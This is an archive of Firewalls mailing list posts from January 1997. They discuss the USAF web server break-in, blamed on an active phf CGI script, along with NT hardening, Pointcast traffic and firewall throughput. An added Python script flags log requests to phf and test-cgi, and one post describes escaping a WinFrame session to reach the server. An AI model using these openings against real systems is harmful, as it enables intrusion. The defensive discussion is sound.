From: Matthew Patton[SMTP:patton@sysnet.net]
Sent: 5 January 1997 00:50
To: Sebastian Stache
Subject: Re: Air Force Web Site Hacked

> Or are there html specific inherent weaknesses not necessarily in the
> protocol but in the ancient and poor setups used by most casual webadmins.

Not 1 week before the incident I urged ASSIST (the military pseudo equiv of CERT) to start beating the drum about pathetically insecure websites. People routinely leave test-cgi with all its niceties left available. Did they have FTP? Probably.

It is appalling how little the 'network professionals' really know about their systems, host and network security. I thought the Pentagon could command better. I'm reminded daily that this isn't so, whether it be military folk or contractors.
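Patton's remark above about test-cgi being left available (and the phf script named later in this thread) suggests a check a webmaster can run on the server's own access log. This is an added example, not code from any list post: it parses Common Log Format lines, flags requests to sample CGI programs that should have been removed, and summarises them per script and per client host. The log lines, addresses and the list of script paths are constructed for the example.

```python
"""Audit a web server access log for requests to sample/demo CGI scripts.

Added example, not from any list post. Flags hits on the demo CGI programs
named in this thread (phf, test-cgi), which belong on no production server,
and reports them per script and per requesting host.
"""
import re
from collections import Counter, defaultdict

# Demo/sample CGI programs the thread says are routinely left installed.
# Constructed list; extend it with whatever your server shipped with.
RISKY_CGI = ("/cgi-bin/phf", "/cgi-bin/test-cgi")

# Common Log Format: host ident authuser [date] "request" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\d+|-)$'
)


def parse_clf(line):
    """Return a dict of the CLF fields, or None if the line does not parse."""
    m = CLF_RE.match(line.strip())
    return m.groupdict() if m else None


def script_of(path):
    """Strip the query string and normalise case so /CGI-BIN/PHF?x matches."""
    return path.split("?", 1)[0].lower()


def is_risky_request(path):
    """True if the request names one of the demo CGI scripts."""
    return script_of(path) in RISKY_CGI


def audit(lines):
    """Scan log lines; return (hits_per_script, hits_per_host, unparsed_lines).

    Unparsable lines are returned rather than dropped, so a corrupt or
    truncated log is visible to the person reviewing the report.
    """
    per_script = Counter()
    per_host = defaultdict(list)
    unparsed = []
    for line in lines:
        rec = parse_clf(line)
        if rec is None:
            unparsed.append(line)
            continue
        if is_risky_request(rec["path"]):
            per_script[script_of(rec["path"])] += 1
            per_host[rec["host"]].append((rec["time"], rec["path"], rec["status"]))
    return per_script, dict(per_host), unparsed


# Constructed sample log (private addresses, invented timestamps), not real data.
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Jan/1997:09:12:01 -0500] "GET /index.html HTTP/1.0" 200 1043',
    '10.0.0.9 - - [08/Jan/1997:09:12:44 -0500] "GET /cgi-bin/phf HTTP/1.0" 200 512',
    '10.0.0.9 - - [08/Jan/1997:09:13:02 -0500] "GET /cgi-bin/phf?Qname=smith HTTP/1.0" 200 690',
    '10.0.0.7 - - [08/Jan/1997:09:15:10 -0500] "GET /cgi-bin/test-cgi HTTP/1.0" 200 311',
    '10.0.0.5 - - [08/Jan/1997:09:16:30 -0500] "GET /images/logo.gif HTTP/1.0" 304 -',
    'this line is corrupt and is reported rather than silently dropped',
]

if __name__ == "__main__":
    scripts, hosts, bad = audit(SAMPLE_LOG)
    for script, n in scripts.most_common():
        print(f"{n:4d}  {script}")
    for host, reqs in sorted(hosts.items()):
        print(f"{host}: {len(reqs)} request(s) to demo CGI scripts")
    print(f"{len(bad)} unparsed line(s)")
```

Any non-zero count for a script is a finding in itself: the remedy the thread gives is to remove the sample programs, not to tune the detector.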
From firewalls-owner Wed Jan 8 04:14:50 1997
Date: Wed, 8 Jan 1997 12:50:35 +0100
From: Sebastian Stache
To: "'Firewalls (inet/GreatCircle)'"
Cc: "'Wilner@DOCKMASTER.NCSC.MIL'", "'proberts@clark.net'"
Subject: Re: Re: NCSA != NCSC
Message-ID: <01BBFD62.90C9FEC0@ppp52.sbbs.se>

Wilner informed me that:

> Everything except boot-up depends upon the O/S. Nothing is below the "O/S
> layer," nor does one speak of such a layer unless one intends "application as well as
> layer" and doesn't know an application from an O/S, nor can a single byte be
> sent or retrieved over a device (networked or otherwise) unless an O/S is
> relied upon, nor can a single access to memory, disk, or what-have-you be

and more.

This is all quite surprising to me. Even though I like to do so when I'm moody, it's not common practice to refer to MS Windows 3 as an application. Most people would call it an (however able or not) Operating System. And yet, Windows 3 is in every way running on top of DOS. With Windows 95, Microsoft has tried to make it less apparent that DOS is still required. They even remap the video adapter's base address during boot, so as to hide the familiar DOS black screen.

In fact, Microsoft in some ways tries to convince their customers that the windowed environment is nothing but an alternate shell (GUI) to the operating system. To this end, you can choose to start WITHOUT activating the "GUI" by putting a statement "BootGUI=0" in a configuration file. This will render you a text-only shell which looks very much like a DOS prompt. No wonder, it *is* a DOS prompt (in almost every detail equivalent to DOS version 7), and nothing else. You don't have long-filename support, you don't have any network facilities, you can't even use your printers. Unless you type "win", to start Windows 95. As a matter of interest, this is exactly what happens if you change the "BootGUI=0" to "BootGUI=1" - "win" is inserted into the command queue after all other statements in Autoexec.bat have been executed.

Now suppose I wanted to use Drivespace, an MS technique to compress hard disks on the fly. Or even better, Stacker, a 3rd-party equivalent. Either of these would install themselves BELOW Windows 95 (and even more interestingly, in some respects even below DOS) but ABOVE the ROM-based BIOS (binary I/O OS). To Windows 95 (and to DOS), the compression activities would be transparent, i.e. Windows would not *know* about them. Which of course is the whole point.

I don't think there's any point in mentioning utilities that halt the computer when a virus is detected, or when battery status is low, or when the Debug-mode button is pressed, or when a source-routed packet arrives.
From firewalls-owner Wed Jan 8 04:59:16 1997
Date: Wed, 8 Jan 1997 07:56:33 -0500 (EST)
From: "Henry W. Farkas"
To: "Starkweather, Mike"
Cc: "'firewalls@GreatCircle.COM'"
Subject: Re: Pointcast

On Tue, 7 Jan 1997, Starkweather, Mike wrote:

> I am wondering how the members of this mail list have handled the
> flood of traffic generated by Pointcast. It has buried our firewall
> (Tis Toolkit) with the huge number of requests it generates. Their
> I-Server seems to help some but not as much as I had hoped.

For starters, you might ask everyone to update on a limited schedule, customized schedule, or manually: that is, only when the update button is pressed. We had the same problem. It turns out that most people simply did not understand the implications of the "all day schedule" option, which claims to be "best for direct internet connections". So, that's what many people chose. Simply informing them helped quite a bit, but we are still considering getting our own Pointcast server. Partly because there is an "early morning slam" on our firewalls, caused by a flood of people coming in, updating Pointcast and reading Dilbert....

===============================================================================
Outside of a dog, a book is a man's best friend. Inside of a dog, it's too dark to read.
PGP fingerprint AA D0 F5 44 C1 8C 11 52 - B3 80 34 1C CE 38 EC 53

From firewalls-owner Wed Jan 8 05:14:35 1997
Date: Wed, 08 Jan 1997 8:00:59 EST
From: "W.C. Epperson"
Reply-To: epperson@vak12ed.edu
To: cwlim@ncs.com.sg (Henry Lim Chee Wee)
Cc: firewalls@greatcircle.com
Subject: Re: To Firewall or Not to Firewall?
In-Reply-To: <32D2F4C6.5DA5@ncs.com.sg>; from "Henry Lim Chee Wee" at Jan 08, 97 9:13 am
Message-Id: <199701081302.FAA17126@miles.greatcircle.com>

Henry could of sed:
>
> IMHO, a firewall is necessary as long as you are not running a
> standalone web server with sole access to the Internet. O'Reilly's
> WebSite is an application program running over a largely insecure
> OS platform that will still allow the purposeful prankster to ruin
> your show for a laugh.
>

Sigh. All together now:

Step 1: risk assessment
Step 2: security policy
Step 3: implementation (including firewall if needed)

Remember the old cartoon with the caption "You guys start coding and I'll go up and see what they want"?

--
W.C. Epperson
Senior SE
Information Security Officer
DBA Emeritus
Curmudgeon-for-Life
Virginia Dept. of Education
epperson@pen.k12.va.us

"I have great faith in fools. Self-confidence, my friends call it."
--Edgar Allan Poe--

From firewalls-owner Wed Jan 8 05:30:42 1997
Date: Wed, 08 Jan 1997 07:37:33 -0500 (EST)
From: JOHNSON@neu.edu
To: firewalls@GreatCircle.com
Subject: Firewall throughput measurements.
Message-id: <01IDYNDREAPU99DTTA@neu.edu>

[decloak]

I remember sometime back there were firewall throughput questions concerning what happens if a firewall box is used with high speed links on both sides. In my case I'm thinking 4 or 16 mb token ring on one side and similar links on the other, or TR to Ethernet or Ethernet to Ethernet. The numbers I've seen are measured with a T1 on one side and an Ethernet on the other. In this case the T1 is the throttle and you expect a certain traffic rate. But it was unknown back then what happens in the other cases mentioned above.

Now I expect that there will be a delay more significant than that of a router. A firewall isn't a router; it's a firewall. A great many firewall functions happen at layer 7 while strict routing is a layer 3 issue. So there's more software to plow through, generally speaking, in a firewall. And I'm sure the numbers will depend on just how much firewalling is going on.

Has anybody done any measurements of what happens when a firewall is used between two high speed links? I'd be very interested in numbers or pointers to same. Thanks.

Chris J.
NU

[recloak]

============================================================================
Chris Johnson                         Internet: johnson@nuhub.dac.neu.edu
Assistant Director, Systems           BITNET:   defunct
Division of Academic Computing        Voice:    617.373.3300
Northeastern University, 39RI         FAX:      617.373.8600
360 Huntington Ave.                   50% of all doctors graduated
Boston, MA. U.S.A. 02115              in the lower half of the class
============================================================================

From firewalls-owner Wed Jan 8 05:49:17 1997
Date: Wed, 8 Jan 1997 14:50:13 +0200
From: "A. Ömer Köker"
To: "'Firewalls@GreatCircle.COM'", "'Matthew Patton'"
Subject: RE: USAF: how it was hacked

Interestingly enough, this specific hole was described in detail in the latest 2600 mag.

Now you know they will start reading it...

> ----------
> From: Matthew Patton[SMTP:patton@sysnet.net]
> Sent: Wednesday, 8 January 1997 01:09
> To: Firewalls@GreatCircle.COM
> Subject: USAF: how it was hacked
>
> No, this isn't about cdrom based web content.
>
> Really quite anticlimactic.
> The infamous phf script was left active on
> the server and was how they got in. Root, the whole 9 yards.
>
> What's really funny is that no more than a week prior to the incident, I
> suggested to ASSIST (the military's equiv of CERT, and now financial
> sponsor of same) that in light of the minor poking around I did on a
> handful of military web sites, that they needed to get the word out to
> admins because so many servers were in a high state of misconfiguration
> and just waiting to be exploited. 7 days later, boom!!
>
> I'm not sure on what grounds people place so much trust in the military
> to do things right with respect to host and network security. I'm sure
> there are segments that do a damn fine job, but seeing the abject lack of
> skills and knowledge in the Pentagon area makes me a mite bit skeptical
> and not a little ashamed. It's a wonder we don't see high profile
> exploits on a routine basis. Don't get me wrong, the private sector
> doesn't have their act together on many fronts as well.
>
> Now hopefully the thread can die in peace.
>

From firewalls-owner Wed Jan 8 05:53:18 1997
Date: Wed, 08 Jan 1997 08:40:15 -0500
From: "Steven E. Matkoski"
Reply-To: uscny8hb@ibmmail.com
Organization: Blue Cross Blue Shield of CNY
To: Firewalls@GreatCircle.COM
Subject: Re: internal filtering router - filter config?
References: <199701080648.WAA21235@miles.greatcircle.com>
Message-ID: <32D3A3BF.5D36@dreamscape.com>

Firewalls-Digest wrote:
>
> In your external router you'd block any ICMP traffic going back and
> forth, as well as any packets bearing one of your internal IP addresses
> as a source address, especially if these are going INTO your protected
> network. Also, kill telnets, fingers, snmp and snmp trap. Actually, kill
> any ports that your users will not be using, and leave just mail, web,
> ftp, etc.
>
> ricardo
> ralvarado@avantel.com.mx
>

Thanks. I also read that you could block source-routed packets there, also. If I am using a cisco router, how does one go about this? Or can I get a location for documentation?

Thanks!

-steve.
matkoski@dreamscape.com

From firewalls-owner Wed Jan 8 06:16:31 1997
Date: Wed, 8 Jan 1997 06:59:10 -0700 (MST)
From: Tom Szucs
To: firewalls@greatcircle.com
Subject: NFS

What sort of security issues revolve around running NFS on a network? Can filesystems be exported securely to a specific host, provided that we can control routes which would prevent spoofed IP addresses from being able to have any data routed back correctly? We are running direct ethernet connections as well as ATM PVCs.

Any assistance would be appreciated and can be sent to me directly. I can post highlights or key points back to the group.

Thanx in advance.

Tom Szucs, Geo-X Systems Ltd.

From firewalls-owner Wed Jan 8 06:29:56 1997
Date: Wed, 8 Jan 97 15:16:05 PST
From: Denis Valois
To: Firewalls@GreatCircle.COM, michael dreves
Subject: Re: Firewalls-Digest V6 #8

Dear Michael,

As you can see, it is rather unpleasant not to be able to understand a posted message. In future, could you compose your messages in a dialect comprehensible to all, or alternatively send such messages only to their legitimate recipients?

Thanks in advance for your understanding and your civic-mindedness,

Denis Valois
Computer Security
SITA (Société Internationale de Télécommunications Aéronautiques)

On Wed, 08 Jan 1997 10:16:14 +0100 michael dreves wrote:
> Hi sweet Sus,
>
> here comes Flemming's new e-mail.... there are actually two addresses
> that we should try:
>
> drc@drc.baku.az (Danish Refugee Council)
> fdr@drc.baku.az (presumably Flemming)
>
>
> Kind regards,
>
> --
> michael dreves (MD113-RIPE), System Consultant
> Berendsen Data, Phone +45-39577300, Fax +45-39577302
> Key fingerprint = 01 99 2B 6F F1 2E 47 4D 87 6D 98 55 91 42 F8 4D
>

From firewalls-owner Wed Jan 8 06:49:48 1997
Date: Wed, 08 Jan 1997 16:27:36 +0200
From: mike
To: firewalls@greatcircle.com
Subject: FW-1 hacked?
Message-Id: <32D3AED8.4DB7@queenstown.org>

Hi all

Does anyone know if FW-1 was ever hacked?
From firewalls-owner Wed Jan 8 07:01:50 1997
Date: Wed, 8 Jan 1997 09:36:47 -0500
From: KBarlow@acccorp.com (Ken Barlow)
To: "'firewalls@GreatCircle.COM'", "Starkweather; Mike"
Subject: Re: Pointcast
Message-ID: <2D3B3AC0.@acccorp.com>

We too had this problem. We bent to the will of Pointcast and purchased the server software, and it doesn't work as advertised. It's buggy, hard to configure, many unpublished problems (nevertheless known to some ppl in Customer Service). It did reduce traffic though. We also shut down the Pointcast sites from every internal machine except the Pointcast server. I find it's one of those subjects that costs a lot and produces _no_ benefit for the company.

Regards,
Ken B.
ACC Long Distance

______________________________ Reply Separator _________________________________
Subject: Pointcast
Author: "Starkweather; Mike" at Internet
Date: 1/7/97 1:29 PM

I am wondering how the members of this mail list have handled the flood of traffic generated by Pointcast. It has buried our firewall (Tis Toolkit) with the huge number of requests it generates. Their I-Server seems to help some but not as much as I had hoped. If this is the wrong place for this question please redirect me.

Mike Starkweather
Anheuser-Busch

From firewalls-owner Wed Jan 8 07:14:24 1997
Date: Wed, 8 Jan 1997 11:02:14 -0400
From: "Jamie Thain"
To: "Franke Albert 2 Lt USAFE CSS/SCBS", "'firewalls@GreatCircle.com'"
Subject: Re: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!!
Message-Id: <199701081506.HAA23909@miles.greatcircle.com>

Frank,

I might refer your captain to the hacking of the af site that happened a week ago, and some funding might appear. NT properly secured can take some licks, but if it were moi, I would dig up an old 486 with a couple of network cards and put a Linux machine with FWTK in front of it. You must have a UNIX person around. I have to pay the consulting time, and it normally costs me about $1,000 per configuration session, but the software is free.

But, do all that you can to secure the NT machine.

1. Put two network cards in the machine, one inside and one out, and disable the IP routing.
2. Disable the bindings for WINS to Workstation, Server and NetBIOS in the bindings to the OUTSIDE card.
3. Under the TCP/IP protocol - Properties - Advanced, select Enable Security, then configure the security and allow only TCP port 80 if you are serving Web only. Add other ports for the ports you are serving.
4. Rename the Administrator account to something else like BigMachineBoss, or even better, Steve Smith (no reference to roll).
5. Turn on Auditing.
6. Put the WebServer entirely on a separate drive and give access for the Web server only to that drive.
7. Check the eventvwr security log often.
8. Go to http://www.somarsoft.com and read through the NT security faq.

This is just a start, and others I am sure will kick in...

regards: jamie

From firewalls-owner Wed Jan 8 07:34:28 1997
Date: Wed, 8 Jan 1997 11:06:20 -0400
From: "Jamie Thain"
To: "darren cromer", "massimo.cotrozzi"
Cc: "'xavier fauquet'", "'les@tracker.demon.co.uk'", "'firewalls@greatcircle.com'"
Subject: Re: Using Remote Workstation as Hole??
Message-Id: <199701081510.HAA24092@miles.greatcircle.com>

Massimo,

You should be able to run Winfile.exe on your winframe and the users should not be able to cause damage. You should not have to use a browser to get there. The idea is to secure the central computer so a single user can use the OS without damaging it. Although I know I can think of ways to damage it, and I am sure students would as well, you can take away most rights from the client of any importance. It is difficult however to keep them from filling the disk with unwanted files if they have write rights to any directory, as NT does not have a native disk auditor.

regards: jamie

----------
> From: massimo.cotrozzi
> To: darren cromer
> Cc: 'xavier fauquet'; 'les@tracker.demon.co.uk'; 'firewalls@greatcircle.com'
> Subject: RE: Using Remote Workstation as Hole??
> Date: Wednesday, January 08, 1997 6:04 AM
>
>
> >
> > On Mon, 6 Jan 1997 00:49:13 +0100, you wrote:
> > > Could someone point me to a site explaining to me what
> > > Winframe is?
> >
> > I think ... http://www.cytrix.com ?
> >
> > Winframe is a remote processing system which allows PC clients to run server
> > applications on a Windows system rather than using their own processing
> > power.
> >
> > I think.
> >
> > ...Les...
> >
>
>
> One very nice hole of a poor (common) installation of WinFrame is that if you
> let people use browsers (say NT IE 2) on the server side of the connection they
> can just "browse" an executable (say winfile) and ... voila', pop up a window
> browsing the server from the client ....
> (This one is just a few hits away on your keyboard.)
>
> Massimo Cotrozzi
>
> Arthur Andersen - Computer Risk Management
> Computer Security Senior Consultant
> Via della Moscova 3, 20121 Milano
> Tel. ++ 39-2-290371

From firewalls-owner Wed Jan 8 09:23:19 1997
Date: Wed, 8 Jan 97 11:46 EST
From: Peter Ngo
To: drexx, David Wee
Cc: firewalls
Subject: Re[2]: FW-1 throughput? Etc.
Message-Id: <34970108164643/0007044148PJ2EM@MCIMAIL.COM>

Hi,

1. There is a good white paper of Firewall-1 Performance Testing results based on Sun Ultra 170, Sparc5, and X86 with Solaris 2.5 @ http://CheckPoint.com
2. It does support VPN. There is a VPN patch.
3. Check the home page http://checkpoint.com.

Hope this would help,

Peter Ngo

______________________________ Reply Separator _________________________________
Subject: Re: FW-1 throughput? Etc.
Author: David Wee|INTERNET|David.Wee@singapore.sun.com at MCIMAIL
Date: 1/8/97 12:33 AM

> From David.Wee@Singapore Sun Jan 5 23:55:38 1997
> Date: Mon, 6 Jan 1997 15:53:50 +0800
> From: David.Wee@Singapore (David Wee)
> To: julie.gupta@Corp
> Subject: FW-1 throughput? Etc.
> Cc: David.Wee@Singapore
>
> Julie,
>
>
> Can you please help answer 1 & 2
>
>
> Regards, david
> ----- Begin Included Message -----
>
> From drexx@sunphil.mozcom.com Mon Jan 6 15:45:31 1997
> Date: Mon, 6 Jan 1997 15:46:44 -0800
> From: drexx@sunphil.mozcom.com (Dexter D. Laggui)
> To: firewalls@greatcircle.com, dwee@Singapore
> Subject: FW-1 throughput? Etc.
>
> Hello world,
>
> I would be very much obliged if anybody can please answer this:
>
> 1] How many packets per second can the Solstice Firewall-1 2.1
>    (installed in a Sun Sparcstation 20 with Solaris 2.5)
>    process? In mbps terms?
> 2] Current needs dictate a solution involving FWs with multiple
>    secure VPNs to mobile customers. I like the capabilities of
>    FW-1 2.1 very much but I understand that it does not support VPN
>    today. Do I need the SunScreen to complement it? :-(
> 3] Who do I talk to in Sun Singapore for FW and SunScreen training?
>    What is the mailing list for Checkpoint/Solstice Firewall-1 users?
>
> Thank you very much for your kindness. :-)
>
> Yours,
> Dexter D. Laggui
> Systems Engineer
>
> drexx@sunphil.mozcom.com
> Philippine Systems Products Inc.
>
>
> ----- End Included Message -----
>
>

From firewalls-owner Wed Jan 8 10:19:15 1997
Date: Wed, 08 Jan 1997 12:40:25 -0500
From: oolid@acqic.org (Joseph L. Moll)
To: firewalls@greatcircle.com
Subject: Microsoft Rome?
Message-Id: <2.2.32.19970108174025.00902258@mail.acqic.org>

Can anyone comment on what the "ms-rome 569/udp #microsoft rome" service is for?
Regards, Joe, oolid@acqic.org From firewalls-owner Wed Jan 8 10:23:07 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id IAA02040 for firewalls-outgoing; Wed, 8 Jan 1997 08:59:18 -0800 (PST) Received: from www.steldyn.com (www.steldyn.com [198.68.45.121]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id IAA02014 for ; Wed, 8 Jan 1997 08:59:01 -0800 (PST) Received: from juneau.steldyn.com (172.16.31.1) by www.steldyn.com (EMWAC SMTPRS 0.81) with SMTP id ; Wed, 08 Jan 1997 10:05:48 -0700 Received: by juneau.steldyn.com with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFD4A.A17D20C0@juneau.steldyn.com>; Wed, 8 Jan 1997 09:59:26 -0700 Message-ID: From: Chris Pugrud To: "'Franke Albert 2 Lt USAFE CSS/SCBS'" , Firewalls Mailing list Subject: RE: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!! Date: Wed, 8 Jan 1997 09:59:25 -0700 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This really as not as bad of a situation as it seems. Here are a few pointers to vastly increasing the security of the system. This is not the be all or end all of security. I am sure that there are more steps that you can take to increase your security even more. Buyer Beware. Your mileage may vary... Apply sp2 for Windows NT 4.0 SP2 fixes several bugs in the OS and IIS http://www.microsoft.com/ntserversupport/Default-SL.HTM The machine really should be used only for serving web pages. If you can dedicate a singular machine, even a 486, to just tossing HTTP then you can greatly increase the security. 
Under Control Panel > Services, Only the following MUST be running for a web server: EventLog FTP Publishing Service (optional) Plug and Play (NT 4.0) Workstation World Wide Web Publishing Service Only these services should be set "Automatic". All other services should be set "manual." Be careful, your mileage may vary... Use IIS security IIS has some built in allow/deny filtering based on IP address Internet Service Manager > WWW Service Properties > Advanced TAB CGI/BIN is BAD (by default) Remove scripts and the HTML Administrator if installed Internet Service Manager > Directories Ideally only "C:\InetPub\wwwroot" "" is listed. Remove all others, especially any that you can not identify. While you are there make sure to go to "logging" and set up logs Also go c:\InetPub and set security NT Explorer > C:\InetPub > right click > properties > security > permissions Replace Permissions on Subdirectories Replace Permissions on Existing Files Make Everyone Read (RX)(RX) Make Administrator Full Control (All)(All) Remove all others This sets things up so that only the administrator can make changes and they must be made from the machine. Use the OS security NT 4.0 has basic packet filtering built in Control Panel > Network > Protocols > TCP/IP > Properties > IP Address > Advanced > Enable Security > Configure Permit Only (TCP Ports) > Add > 80 (http) Permit Only (UDP Ports) > (leave blank) Permit Only (IP Protocols) > Add > 6 (TCP) This really cuts down what the machine can do. If you need to surf from the machine you may need to add 53 to UDP Ports. While you in the control panel, also check your bindings: Control Panel > Network > Bindings > Show Bindings for "all protocols." 
Make sure that "TCP/IP" is Enabled Disable all others Show bindings for "all adapters" Expand the adapter (click the plus box) Expand WINS Client You may need to Enable Workstation If the networking will not start on reboot If you do, make sure to disable server and NetBIOS Interface Restart your computer Good day and Good luck Chris >-----Original Message----- >From: Franke Albert 2 Lt USAFE CSS/SCBS [SMTP:albert.franke@ramstein.af.mil] >Sent: Wednesday, January 08, 1997 3:52 AM >To: Firewalls Mailing list >Subject: I DON'T HAVE FUNDING FOR A FIREWALL...HELP!!! > >I am responsible for securing (as well as I can) a DEC Alpha running >Windows NT 4.0 and Internet Information Server as our WWW Server. It is >sitting as a node on our LAN and everyone in the world can access it. I >want a program that I can run on it that will allow/disallow blocks of >IP addresses such as 132.244 or .AF.MIL only. Also, I would like (but >not as necessary) it to keep detailed logs. I have heard of O'Reiley's >WebSite, but I don't know if this will do. I do not have funding for an >expensive firewall machine, and it is impracticle to add routers into >our LAN. Please help if you have any suggestions. Thanks. > >albert.franke@ramstein.af.mil >Albert E. 
Franke, 2Lt, USAF >OIC, USAFE Web Tech Support 480-7905 From firewalls-owner Wed Jan 8 10:42:40 1997 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id JAA04490 for firewalls-outgoing; Wed, 8 Jan 1997 09:46:23 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id JAA04461 for ; Wed, 8 Jan 1997 09:46:07 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id MAA18010; Wed, 8 Jan 1997 12:42:50 -0500 From: Adam Shostack Message-Id: <199701081742.MAA18010@homeport.org> Subject: Re: USAF: how it was hacked In-Reply-To: <199701080554.AAA17354@news2.mnsinc.com> from matrix at "Jan 8, 97 00:51:01 am" To: smanning@mail1.mnsinc.com (matrix) Date: Wed, 8 Jan 1997 12:42:50 -0500 (EST) Cc: Firewalls@GreatCircle.COM X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Sure we can keep the rumors to a dull roar. Make an official statement about how it was done. Adam | Matthew Patton wrote... | > | > Really quite anticlimatic. The infamous phf script was left active on | > the server and was how they got in. Root, the whole 9 yards. | | Really? What are these statements based on? | | Could we please keep the rumors to a dull roar? Thanks! | | Stephen Manning, Special Agent | Computer Crime Investigator | Air Force Office of Special Investigations | Voice: (301) 981-5469 - Fax: (301) 981-3087 | -- "It is seldom that liberty of any kind is lost all at once." 
-Hume

From firewalls-owner Wed Jan 8 11:35:56 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA09207 for firewalls-outgoing; Wed, 8 Jan 1997 11:02:24 -0800 (PST)
Received: from proton.llumc.edu (proton.llumc.edu [143.197.200.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id LAA09191 for ; Wed, 8 Jan 1997 11:02:09 -0800 (PST)
Received: from mycroft.llumc.edu (mycroft.llumc.edu [143.197.200.18]) by proton.llumc.edu (8.7.6/8.6.9) with SMTP id KAA29068; Wed, 8 Jan 1997 10:58:41 -0800 (PST)
Date: Wed, 8 Jan 1997 10:56:30 -0800 (PST)
From: Michael Baumann
To: Ken Barlow
cc: "'firewalls@GreatCircle.COM'" , "Starkweather; Mike"
Subject: Re: Pointcast
In-Reply-To: <2D3B3AC0.@acccorp.com>
Message-ID:
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

On Wed, 8 Jan 1997, Ken Barlow wrote:

> I find it's one of those subjects that costs a lot and
> produces _no_ benefit for the company.
>

And there is the rub. It produces *no* benefit to the company. It (ab)uses bandwidth. I had no problem at all with management when I suggested we configure our proxy to deny access to the pointcast network. Just say no.

> ______________________________ Reply Separator _________________________________
> Subject: Pointcast
> Author: "Starkweather; Mike" at Internet
> Date: 1/7/97 1:29 PM
>
> I am wondering how the members of this mail list have handled the
> flood of traffic generated by Pointcast. It has buried our firewall
> (Tis Toolkit) with the huge number of requests it generates. Their
> I-Server seems to help some but not as much as I had hoped.
>
> If this is the wrong place for this question please redirect me.
>
> Mike Starkweather
> Anheuser-Busch
>

--
Michael Baumann, Optivus Technology Inc. | Loma Linda University Medical Center
San Bernardino, California. (909)799-8308 | Internet: baumann@llumc.edu

From firewalls-owner Wed Jan 8 11:40:13 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA08736 for firewalls-outgoing; Wed, 8 Jan 1997 10:54:41 -0800 (PST)
Received: from atzhcd3.gordon.army.mil (atzhcd3.gordon.army.mil [147.51.83.3]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with SMTP id KAA08672 for ; Wed, 8 Jan 1997 10:54:00 -0800 (PST)
Received: by atzhcd3.gordon.army.mil with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63) id <01BBFD6B.32083FB0@atzhcd3.gordon.army.mil>; Wed, 8 Jan 1997 13:52:32 -0500
Message-ID:
From: Thomas Duke
To: "'Firewalls@GreatCircle.COM'"
Subject: RE: USAF: how it was hacked
Date: Wed, 8 Jan 1997 13:52:31 -0500
X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.994.63
Sender: firewalls-owner@GreatCircle.COM
Precedence: bulk

The military, like any other organization, has to realize they must pay for the skill sets necessary to perform these tasks. The majority of people that do these things are not skilled....and won't be until the military/gov figures out how to reward/pay IS professionals creatively like the military doctors/dentists. Why would I want to stay in the gov/mil business getting 1/2 my value?

>----------
>From: A. Omer Koker[SMTP:omer@superonline.net]
>Sent: Wednesday, January 08, 1997 7:50 AM
>To: 'Firewalls@GreatCircle.COM'; 'Matthew Patton'
>Subject: RE: USAF: how it was hacked
>
>Interestingly enough this specific hole was described in detail on the
>latest 2600mag.
>now you know they will start reading it...
>
>>----------
>>From: Matthew Patton[SMTP:patton@sysnet.net]
>>Sent: 08 Ocak 1997 Cartamba 01:09
>>To: Firewalls@GreatCircle.COM
>>Subject: USAF: how it was hacked
>>
>>No, this isn't about cdrom based web content.
>>
>>Really quite anticlimactic. The infamous phf script was left active on
>>the server and was how they got in. Root, the whole 9 yards.
>>
>>What's really funny is that no more than a week prior to the incident, I
>>suggested to ASSIST (the military's equiv of CERT, and now financial
>>sponsor of same) that in light of the minor poking around I did on a
>>handful of military web sites, that they needed to get the word out to
>>admins because so many servers were in a high state of misconfiguration
>>and just waiting to be exploited. 7 days later, boom!!
>>
>>I'm not sure on what grounds people place so much trust in the military
>>to do things right with respect to host and network security. I'm sure
>>there are segments that do a damn fine job, but seeing the abject lack of
>>skills and knowledge in the Pentagon area makes me a mite bit skeptical
>>and not a little ashamed. It's a wonder we don't see high profile
>>exploits on a routine basis. Don't get me wrong, the private sector
>>doesn't have their act together on many fronts as well.
>>
>>Now hopefully the thread can die in peace.
>>
>

From firewalls-owner Wed Jan 8 12:55:23 1997
Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA14270 for firewalls-outgoing; Wed, 8 Jan 1997 12:19:47 -0800 (PST)
Received: from manukau.govt.nz ([202.14.82.1]) by miles.greatcircle.com (8.7.4/Miles-960830-1) with ESMTP id MAA14178 for ; Wed, 8 Jan 1997 12:19:14 -0800 (PST)
Received: by kotuku.manukau.govt.nz id <35722>; Thu, 9 Jan 1997 09:30:34 +1300
Message-Id: <97Jan9.093034nzdt.35722@kotuku.manukau.govt.nz>
From: Matthew Thompson
